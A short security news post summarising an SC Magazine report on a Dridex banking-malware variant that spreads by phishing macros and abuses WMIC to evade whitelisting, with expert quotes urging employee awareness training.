SCMag reported that a new strain of the notorious Dridex malware has been spotted using polymorphism antivirus evasion techniques in phishing emails. The Dridex credential-stealer that almost exclusively targets financial institutions continues to evolve and now uses application whitelisting techniques to infect systems and evade most antivirus products.
According to security researchers, the new variant, discovered mid-June, uses Application Whitelisting techniques to bypass mitigation via disabling or blocking of Windows Script Host. The Dridex developers are highly sophisticated and take advantage of WMI command-line (WMIC) utility's weak execution policy around xls scripts.
Dridex has undergone numerous transformations as it has evolved over the last decade, first appearing as Cridex in 2011. The malware targets banking information on the victim system. It has since added other features, such as a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption.
Researchers made some observations that the campaign using Dridex is evolving: "Given the same-day deployment and implementation of the ssl-pert[.]com domain on June 26th and a tendency to utilise randomly generated variables and URL directories, it is probable the actors behind this variant of Dridex will continue to change up indicators throughout the current campaign."
Employees are the last line of defense against this threat.
The malware was observed arriving through email in the form of a malicious document with embedded macros, according to researchers. Depending on the environment, the macros can be triggered by varying levels of employee interaction. They added that given that email is the initial access point, employees are the last line of defense against this threat.
Javvad Malik, security awareness advocate at KnowBe4, told SC Media UK that while the malware initially was only detected by a handful of companies, the number of antivirus products that can detect it will increase in the coming days.
"Because the initial infection comes as a result of an email which requires a user to interact with the attachment, the best form of defense is to provide appropriate user security awareness training to users so that they can best identify and report such emails and, as a result, prevent the infection from occurring altogether," he said.
Jake Moore, cyber-security specialist at ESET, told SC Media UK that it feels as long as phishing emails have been around, Dridex has not been far behind. SCMag has the full story.